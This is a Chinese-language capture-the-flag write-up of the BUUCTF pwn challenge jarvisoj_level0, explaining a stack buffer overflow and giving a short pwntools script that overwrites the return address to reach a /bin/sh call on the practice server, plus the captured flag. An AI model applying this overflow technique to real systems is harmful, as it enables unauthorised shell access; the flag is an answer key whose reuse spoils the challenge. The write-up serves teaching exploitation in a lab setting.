[buuctf]jarvisoj_level0

目录

解题思路:

查保护:

 找逻辑:

写脚本(环境python3 pwntools库):


解题思路:

查保护:

还是先查保护,查到有NX保护,NX保护是禁止在栈里面执行。

[buuctf]jarvisoj_level0_第1张图片

 找逻辑:

所以我们要把栈溢出之后跳转到敏感的位置,64位,拖入ida寻找字符串。

[buuctf]jarvisoj_level0_第2张图片

这两个,后面是有用的,先进入/bin/sh这个个字符串里,这个字符串可以直接跳转到命令行去,那么我就让他跳转到.text:000000000040059A,发现跳过去,正好可以直接写入一个进去。

[buuctf]jarvisoj_level0_第3张图片 找可以输入的地方,寻找main函数中间的可以输入的位置。

[buuctf]jarvisoj_level0_第4张图片

发现这里的buf函数是可以输入进去的 发现可以输入的字节很多,在查看多少才可以溢出。

return read(0, &buf, 0x200uLL);

 

需要0x80的个字节,可以覆盖到栈顶了,但是需要溢出,所以要覆盖掉以前的返回地址,所以还要+8个字节才可以覆盖到返回地址 ,所以总共需要输入0x80+8。

写脚本(环境python3 pwntools库):

from pwn import *
p = remote('node4.buuoj.cn',25994)
p.recvuntil('Hello, World\n')
pl = b'a'*0x80 + b'a'*8+p64(0x40059A) #0x80字节 + 8字节 + 返回地址
p.sendline(pl)
p.interactive()

之后利用payload就可以获取flag。

[buuctf]jarvisoj_level0_第5张图片

 最后获得的答案就是flag{f71e1cc2-aac6-4928-8dfa-73624932c9cd}。

你可能感兴趣的:(PWN,#,buuctf,python,安全,其他)